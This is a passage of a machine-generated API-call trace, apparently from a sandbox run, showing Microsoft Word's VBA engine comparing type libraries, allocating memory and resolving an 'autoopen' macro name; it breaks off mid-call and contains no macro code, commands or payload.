(_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0045.322] IUnknown:AddRef (This=0x7edf740) returned 0x7 [0045.322] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x2061c8, pDummy=0x0 | out: ppTLibAttr=0x2061c8, pDummy=0x0) returned 0x0 [0045.322] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x2061e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xc0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xc0) returned 0x0 [0045.322] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6ddf0 [0045.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x206250, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0045.322] strcpy_s (in: _Dst=0x7fd4c80, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0045.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x206360, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0045.322] strcpy_s (in: _Dst=0x7fd4cd0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0045.322] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6e240 [0045.322] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.322] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.322] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.322] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0045.323] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0045.323] IUnknown:AddRef (This=0x3dd7b80) returned 0x10 [0045.323] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x2061c8, pDummy=0x0 | out: ppTLibAttr=0x2061c8, pDummy=0x0) returned 0x0 [0045.323] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x2061e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x206250, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0045.323] strcpy_s (in: _Dst=0x7fd4d40, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0045.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x206360, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0045.323] strcpy_s (in: _Dst=0x7fd4d88, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0045.323] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d8d50 [0045.323] IUnknown:AddRef (This=0x3dd7b80) returned 0x11 [0045.323] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0045.323] IUnknown:Release (This=0x3dd7b80) returned 0x10 [0045.323] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0045.323] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0045.324] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0045.324] IUnknown:AddRef (This=0x7ee0550) returned 0x8 [0045.324] ITypeLib:RemoteGetLibAttr (in: This=0x7ee0550, ppTLibAttr=0x2061c8, pDummy=0x0 | out: ppTLibAttr=0x2061c8, pDummy=0x0) returned 0x0 [0045.324] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x2061e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x206250, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0045.324] strcpy_s (in: _Dst=0x81d8dd8, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0045.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x206360, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0045.324] strcpy_s (in: _Dst=0x81d8e00, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0045.324] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.324] ITypeLib:LocalReleaseTLibAttr (This=0x7ee0550) returned 0x0 [0045.324] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.325] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x20) returned 0x7dfed00 [0045.325] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0045.325] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0045.326] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0045.326] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CNormal") returned 4 [0045.326] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0045.326] IUnknown:AddRef (This=0x7edffb0) returned 0x6 [0045.326] ITypeLib:RemoteGetLibAttr (in: This=0x7edffb0, ppTLibAttr=0x2061c8, pDummy=0x0 | out: ppTLibAttr=0x2061c8, pDummy=0x0) returned 0x0 [0045.326] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x2061e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x206250, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpUsedDefaultChar=0x0) returned 63 [0045.326] strcpy_s (in: _Dst=0x81d8e70, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0045.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x206360, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0045.326] strcpy_s (in: _Dst=0x81d8eb8, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0045.326] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.326] ITypeLib:LocalReleaseTLibAttr (This=0x7edffb0) returned 0x0 [0045.327] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.327] IMalloc:Free (This=0x7feff045380, pv=0x817bd50) [0045.327] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x205e28, pDummy=0x81f5c40 | out: ppTypeAttr=0x205e28, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.327] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.327] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.327] IMalloc:Alloc (This=0x7feff045380, cb=0x118) returned 0x3dbd210 [0045.328] IMalloc:Alloc (This=0x7feff045380, cb=0xe30) returned 0x81e83f0 [0045.328] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205e08, pDummy=0x205e44 | out: ppTypeAttr=0x205e08, pDummy=0x205e44*=0xffffffff) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x0, ppFuncDesc=0x205e00, pDummy=0x205e48 | out: ppFuncDesc=0x205e00, pDummy=0x205e48*=0x7f72450) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x1, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x2, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x3, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x4, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x5, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x6, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x7, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x8, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x9, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xa, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xb, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xc, ppFuncDesc=0x205e00, pDummy=0x100 | out: ppFuncDesc=0x205e00, pDummy=0x100) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205e08, pDummy=0x205e44 | out: ppTypeAttr=0x205e08, pDummy=0x205e44*=0xffffffff) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x0, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x1, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x2, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x3, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x4, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x5, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x6, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x7, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.328] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x8, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.329] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.329] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x9, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.329] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.329] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xa, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.329] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.329] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xb, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.329] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.329] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xc, ppFuncDesc=0x205e00, pDummy=0xc0 | out: ppFuncDesc=0x205e00, pDummy=0xc0) returned 0x0 [0045.329] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.329] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.329] IUnknown:Release (This=0x7f72450) returned 0x5 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bd50 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bc70 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bcb0 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bcf0 [0045.329] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205708 | out: ppvObject=0x205708*=0x0) returned 0x80004002 [0045.329] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205700, pDummy=0x10 | out: ppTypeAttr=0x205700, pDummy=0x10) returned 0x0 [0045.329] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205688 | out: ppvObject=0x205688*=0x0) returned 0x80004002 [0045.329] IUnknown:AddRef (This=0x7f72450) returned 0x6 [0045.329] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205680, pDummy=0x10 | out: ppTypeAttr=0x205680, pDummy=0x10) returned 0x0 [0045.329] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.329] IUnknown:Release (This=0x7f72450) returned 0x5 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d8fa0 [0045.329] strcpy_s (in: _Dst=0x81d8fe0, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0045.329] IMalloc:Alloc (This=0x7feff045380, cb=0xc8) returned 0x81348e0 [0045.329] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205640, pDummy=0x7f72450 | out: ppTypeAttr=0x205640, pDummy=0x7f72450*=0xff4207b0) returned 0x0 [0045.329] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x7f72450, ppTLib=0x205648, pIndex=0x205688 | out: ppTLib=0x205648*=0x3dd7b80, pIndex=0x205688*=0x20e) returned 0x0 [0045.329] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x205338, pDummy=0x0 | out: ppTLibAttr=0x205338, pDummy=0x0) returned 0x0 [0045.329] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x205350, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2061a0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2061a0*="") returned 0x0 [0045.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x2053c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 58 [0045.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2054d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0045.330] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0045.330] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6e690 [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d91f0 [0045.330] IUnknown:AddRef (This=0x7f72450) returned 0x6 [0045.330] IUnknown:Release (This=0x3dd7b80) returned 0x11 [0045.330] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.330] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.330] _mbscpy_s (in: _Dst=0x205270, _DstSizeInBytes=0x9, _Src=0x30d2b32 | out: _Dst=0x205270) returned 0x0 [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x48) returned 0x7fc2130 [0045.330] strcpy_s (in: _Dst=0x81d8ff8, _DstSize=0x9, _Src="autoopen" | out: _Dst="autoopen") returned 0x0 [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.330] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.330] GetCurrentProcess () returned 0xffffffffffffffff [0045.330] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x45) returned 1 [0045.330] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x14) returned 0x817bd10 [0045.330] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6eae0 [0045.330] IMalloc:Free (This=0x7feff045380, pv=0x817bd10) [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c8c0 [0045.330] IMalloc:GetSize (This=0x7feff045380, pv=0x811c8c0) returned 0x80 [0045.330] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bd10 [0045.330] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="autoopen") returned 0x102ad9 [0045.330] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="autoopen", cchCount1=-1, lpString2="autoopen", cchCount2=-1) returned 2 [0045.331] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f183d0 [0045.331] IMalloc:GetSize (This=0x7feff045380, pv=0x7f183d0) returned 0x58 [0045.331] IMalloc:Free (This=0x7feff045380, pv=0x817bbf0) [0045.331] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x817bbf0 [0045.331] IMalloc:Free (This=0x7feff045380, pv=0x817bbf0) [0045.331] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817bbf0 [0045.331] IMalloc:Free (This=0x7feff045380, pv=0x817bbf0) [0045.331] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18430 [0045.331] GetCurrentProcess () returned 0xffffffffffffffff [0045.331] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d9, dwSize=0x8) returned 1 [0045.331] GetCurrentProcess () returned 0xffffffffffffffff [0045.331] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d8, dwSize=0x8) returned 1 [0045.331] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d9, dwSize=0x8) returned 1 [0045.331] GetCurrentProcess () returned 0xffffffffffffffff [0045.331] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d8, dwSize=0x8) returned 1 [0045.331] GetCurrentProcess () returned 0xffffffffffffffff [0045.332] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89e8, dwSize=0x2) returned 1 [0045.332] GetCurrentProcess () returned 0xffffffffffffffff [0045.332] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d8a3c, dwSize=0x45) returned 1 [0045.332] VirtualProtect (in: lpAddress=0x81d8a3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x2063fc | out: lpflOldProtect=0x2063fc*=0x4) returned 1 [0045.332] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.332] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.332] IUnknown:AddRef (This=0x7f723a0) returned 0x3 [0045.332] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb8 | out: ppvObject=0x206fb8*=0x0) returned 0x80004002 [0045.332] IUnknown:QueryInterface (in: This=0x7f723a0, 